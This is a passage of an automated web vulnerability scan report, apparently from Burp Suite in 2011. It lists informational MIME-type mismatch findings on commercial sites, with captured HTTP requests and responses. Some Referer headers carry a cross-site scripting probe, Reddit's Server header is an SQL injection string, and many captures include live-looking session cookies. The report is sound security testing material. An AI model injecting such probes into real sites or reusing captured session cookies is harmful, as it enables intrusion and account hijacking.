Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRbu=Eo1TOtJ24; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-Type: text/plain
Content-Length: 11836
Date: Mon, 13 Jun 2011 11:22:49 GMT
Connection: close

/*PointRoll.2011 v129*/var priw,prih,prz=0,przo=0,prsw=0,prrv=0,prpi=0,prtg=0,prta=1,prpc='',prpf,prcw,prad=0,prca=0,prff=0,prmh=0,prup=0,proto,proto2,prbf=0,proo=0,prgo=0,pria=0,prpdts,prpot=0,prFlag
...[SNIP]...

26.43. http://thesouthern.com/app/port/bulkCommentCount.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/app/port/bulkCommentCount.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.44. http://thesouthern.com/app/port/tabMostCommentedJs.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://thesouthern.com
Path:	/app/port/tabMostCommentedJs.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.45. http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://tunedin.blogs.time.com
Path:	/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/?cf_action=sync_comments&post_id=15917 HTTP/1.1
Host: tunedin.blogs.time.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c03b8f4-13088b8eb97-35137913-1; s_cc=true; s_vnum_d=1308027600453%26vn%3D1; s_vnum_w=1308459600454%26vn%3D1; s_vnum_m=1309496400456%26vn%3D1; s_sq=%5B%5BB%5D%5D; VWCUKP300=L123100/Q69087_13220_65_061311_1_070111_426862x425702x061311x1x1; SVWCUKP300=426862_1; sinvisit_d=true; sinvisit_w=true; sinvisit_m=true; __qseg=Q_D|Q_T|Q_291|Q_446|Q_232|Q_239|Q_249|Q_2900|Q_2899|Q_1758|Q_756|Q_755|Q_539|Q_242|Q_240|Q_237; rsi_segs=H07710_10055|H07710_10194|H07710_10515|H07710_10534|H07710_10541|H07710_10562; __qca=P0-1572414129-1307963947722; __utmz=21887422.1307963949.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=21887422.870943690.1307963949.1307963949.1307963949.1; __utmc=21887422; __utmb=21887422.1.10.1307963949; _chartbeat2=6179nmgwis43xoq4

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 11:25:58 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Content-Length: 2

OK

26.46. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.burstnet.com
Path:	/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.47. http://www.buzzfeed.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.buzzfeed.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.buzzfeed.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:34:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 17 Nov 2006 06:52:37 GMT
ETag: "119011c-37e-4226bd037b740"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-BuzzFeed: feed5
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ..............................."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3."3.
...[SNIP]...

26.48. http://www.expedia.com/daily/js/flash.vbs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.expedia.com
Path:	/daily/js/flash.vbs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/vbscript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /daily/js/flash.vbs HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Cteonnt-Length: 296
Content-Type: text/vbscript
Last-Modified: Thu, 16 Mar 2006 00:03:56 GMT
Accept-Ranges: bytes
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Content-Length: 296
Expires: Thu, 16 Mar 2006 00:03:56 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:20:34 GMT
Connection: close
Vary: Accept-Encoding

Function VBGetSwfVer(i)
   on error resume next
   Dim swControl, swVersion
   swVersion = 0

   set swControl = CreateObject("ShockwaveFlash.ShockwaveFlash." + CStr(i))
   if (IsObject(swControl)) then

...[SNIP]...

26.49. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.expedia.com
Path:	/daily/prod/xmlgrid/psf/PsfGridActivities.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

26.50. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

26.51. http://www.lijit.com/wijit previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.lijit.com
Path:	/wijit

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /wijit?uri=http%3A%2F%2Fwww.lijit.com%2Fusers%2Ffansided&js=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; tpro_inst=ccc7e60c4d109f2ab6f71d3e2488034a; tpro=eJxNkNtuhSAQRf9lnskJF%2FH2G31sGkIQlUTBgDZpjP9eBmN73mZtZvbs4YQthtEtFvoTJusHG7FaNSr0JWsCo32oqi4Ceiq9QjGOGmUEWIamgMjQKlEhCE5ASFV1ZZSApGpbjoTE0ShqU5yMPgyKXZvNx6j0%2Bvjq5LTPQGB2aXvUsM8YkmYLM7tliNajjQ%2FY0EgCP%2FZeInOH8yasZQ1VgqKcHQRVdal5R6CmitFCAk%2Bhbyk7XBGWxd4n%2B%2BDvb5BvcsaGwBT1oJKZS8b2ynPJ7Rjj8ywV9PCxhbgnyFft0DNBm67mHa%2Bvr7%2BL8rfvDsP%2BvxJYw6BMODwOEfi2MbmQ7wX2onBdv4jRfBQ%3D; ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; ljtrtb=eJwNybkRgDAMBMBeLiaQ9flEhke4KYbeYdN9MHDCTYM1lUVL56AJDug%2Ft23T1RIXu7d3pGfPShchF94PtKsN0A%3D%3D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:08 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n36 ( iad-agg-n18), ht brf iad-agg-n18.panthercdn.com
Cache-Control: max-age=600
Expires: Mon, 13 Jun 2011 11:24:04 GMT
Age: 484
Content-Length: 10384
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive

document.write('<div id="f84cf0ce4c049914c1df6a58b26d94ba"> <div id="lwp_main" style="width:160px;" > <div id="lwp_rw" class="f84cf0ce4c049914c1df6a58b26d94ba"></div> <div id="lwp_includedin" class="s
...[SNIP]...

26.52. http://www.mavgear.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mavgear.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.mavgear.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RefererCookie=http%3A%2F%2Fwww.nba.com%2Fmavericks%2Fplayoffs%2F2011_nba_finals_champions.html; store_language=en; __utmz=139702319.1307963468.1.1.utmcsr=mavsdotcom|utmccn=finals|utmcmd=splash|utmctr=mavgear|utmcct=champs; __utma=139702319.829534563.1307963468.1307963468.1307963468.1; __utmc=139702319; __utmb=139702319.1.10.1307963468; xid=612450a171f9b2a6cb69ac0fcabd6f82

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:41 GMT
Server: Apache/2.2.17 (Atomic)
Last-Modified: Thu, 30 Sep 2010 22:27:52 GMT
ETag: "66a2598-1f4be-4918196b38a00"
Accept-Ranges: bytes
Content-Length: 128190
Connection: close
Content-Type: text/plain

............ .........(.......`..... ...................................................................................................................................................................
...[SNIP]...

26.53. http://www.mtv.com/global/music/modules/followUs/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mtv.com
Path:	/global/music/modules/followUs/js/index.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.54. http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mtv.com
Path:	/global/music/modules/rssPartner/js/index.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.55. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mtv.com
Path:	/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg HTTP/1.1
Host: www.mtv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
Cookie: mbox=check#true#1307964934|session#1307964873159-180059#1307966734; mtvn_guid=1307964874-137; __qca=P0-450113519-1307964874594; __cs_rr=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 09 Jun 2011 16:37:10 GMT
ETag: "392ca88-1951-4a54a10829980"
Accept-Ranges: bytes
Content-Length: 6481
Content-Type: image/jpeg
Cache-Control: max-age=1800
Date: Mon, 13 Jun 2011 11:34:57 GMT
Connection: close

GIF89a..Z....l7..P...............H4
SSRddc762...oX%.xA.I.6'.T0WiM............n~c/........O........{WB.................._..k.......................b..f..t.......t....EE;.........%..~u?....\+..~.....F.
...[SNIP]...

26.56. http://www.mtv.com/sitewide/css/charlie/themes/blogs/mtvmoviesblog/bg-tile_1200.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mtv.com
Path:	/sitewide/css/charlie/themes/blogs/mtvmoviesblog/bg-tile_1200.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /sitewide/css/charlie/themes/blogs/mtvmoviesblog/bg-tile_1200.gif HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; mbox=check#true#1307963954|session#1307963884869-321358#1307965754; __cs_rr=1

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 26 Aug 2009 22:12:42 GMT
ETag: "402e2a9-11cc-47212bff00a80"
Accept-Ranges: bytes
Content-Length: 4556
Content-Type: image/gif
Cache-Control: max-age=1800
Date: Mon, 13 Jun 2011 11:19:01 GMT
Connection: close

......JFIF.....d.d......Ducky.......d.....XICC_PROFILE......HLino....mntrRGB XYZ ..... ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...
...[SNIP]...

26.57. http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mtv.com
Path:	/sitewide/modules/footer/brandFooter/js/index.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.58. http://www.mtv.com/sitewide/modules/footer/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mtv.com
Path:	/sitewide/modules/footer/js/index.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.59. http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mtv.com
Path:	/sitewide/modules/header/mtv/js/index.jhtml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.60. http://www.oneregion.com/app/calendar/events/js/calWidget.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.oneregion.com
Path:	/app/calendar/events/js/calWidget.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.61. http://www.paperg.com/jsfb/embed.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.paperg.com
Path:	/jsfb/embed.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.62. http://www.reddit.com/static/spreddit4.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.reddit.com
Path:	/static/spreddit4.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /static/spreddit4.gif HTTP/1.1
Host: www.reddit.com
Proxy-Connection: keep-alive
Referer: http://www.gamershell.com/news_118846.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: reddit_first=%7B%22organic_pos%22%3A%201%2C%20%22firsttime%22%3A%20%22first%22%7D; __utmz=55650728.1305305577.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=55650728.506769273.1305305577.1305305577.1305305577.1

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 589
Last-Modified: Wed, 01 Jul 2009 02:22:02 GMT
Accept-Ranges: bytes
Server: '; DROP TABLE servertypes; --
Cache-Control: max-age=23697
Date: Mon, 13 Jun 2011 11:19:02 GMT
Connection: close
X-N: S

.PNG
.
...IHDR...............h6....gAMA.....OX2....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b<z...)...D..U.....[...$...n]........gp,N...?../...s...._L..{...|N.{......nZa...nLr.K`,.'.y.....o^>?.k
...[SNIP]...

26.63. http://www.stumbleupon.com/hostedbadge.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stumbleupon.com
Path:	/hostedbadge.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /hostedbadge.php?s=5&r=http://www.ugo.com/tv/game-of-thrones-baelor-preview HTTP/1.1
Host: www.stumbleupon.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/tv/game-of-thrones-baelor-preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmf_i=6665060744dec01385c2c88.28433254; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; su_c=0d1e2bedc0e1135deadbc657c2aa8530%7C%7C10%7C%7C1307312440%7Cb38de0b02793b0d025f256428b4dc8bd; __utmz=189632489.1307312449.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; __utma=189632489.866859479.1307275364.1307275364.1307312449.2; __utmv=189632489.|1=user_class=v=1,; su_conf=cfcd208495d565ef66e7dff9f98764da

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=30, max=100
Content-Type: text/html; charset=iso-8859-1
Content-Length: 357
Date: Mon, 13 Jun 2011 11:22:57 GMT
Age: 0
Via: 1.1 varnish
Connection: keep-alive

function writeSuBadge () {
var bdg = "<iframe src=\"http:\/\/www.stumbleupon.com\/badge\/embed\/5\/?url=http%3A%2F%2Fwww.ugo.com%2Ftv%2Fgame-of-thrones-baelor-preview\" scrolling=\"no\" framebord
...[SNIP]...

26.64. http://www2.sesamestats.com/paneltracking.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www2.sesamestats.com
Path:	/paneltracking.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /paneltracking.aspx?bannerid=KtagGeneric_Ktag_893515_41197792_8&CampaignId=KTagGeneric HTTP/1.1
Host: www2.sesamestats.com
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "22ba9d43aa1d26928512e501f6a029a5:1267715541"
Last-Modified: Thu, 04 Mar 2010 15:12:21 GMT
Accept-Ranges: bytes
Content-Length: 58
Content-Type: image/gif
Date: Mon, 13 Jun 2011 11:34:31 GMT
Connection: close
X-N: S

BM:.......6...(...........................................

26.65. http://www24a.glam.com/appdir/resources/rendergadget.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www24a.glam.com
Path:	/appdir/resources/rendergadget.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /appdir/resources/rendergadget.js HTTP/1.1
Host: www24a.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Last-Modified: Thu, 06 Jan 2011 23:52:24 GMT
Server: Jetty(6.1.21)
Vary: Accept-Encoding
Content-Length: 38
Cache-Control: public, max-age=377034
Date: Mon, 13 Jun 2011 11:02:09 GMT
Connection: close

if (window.Atako)Atako.renderGadget();

27. Content type is not specified previous
There are 12 instances of this issue:

http://ad.yieldmanager.com/st
http://ads.bluelithium.com/st
http://www.expedia.com/static/default/default/images/close_button.gif
http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif
http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif
http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif
http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif
http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif
http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png
http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png
http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png
http://www.meebo.com/cmd/tc

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://ad.yieldmanager.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/st

Request

GET /st?ad_type=iframe&ad_size=160x600&section=806254 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!*!$([W!(WdF!$Rc1!1mH9!%ei3!!!!$!?5%!)di=9!wVd.!%vS!!$iom!'t56~~~~~=!i98~~!$%ST~!%.B?!1UC$!%`n`!!!!$!?5%!$8o10!ZmB)!'mla!'me'~~~~~~=$G!==%EaVM.jTN!#+s2!,x.^!%)<k!0)2c!$tyl!6Z#3!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Jsh='HAD!!!([!#2Jp!,x.^!%)<k!2A@,!$u!!!7MU<!?5%!'kH#8!w1K*!(#l)!%B0)!%fK<~~~~~=$Ju6='T?<!!!([!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!#Jl?!,x.^!%)<k!.#:A!%IaL!H<'$!?5%!(L(6:!w1K*!(#l)!#Ae[!%f(g~~~~~=$L#)=%JbC!!!([!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; ih="b!!!!E!'4@g!!!!#=$KA3!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.`.U!!!!#='htS!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2"; vuday1=Gf(n`NBHr8*mOw]; 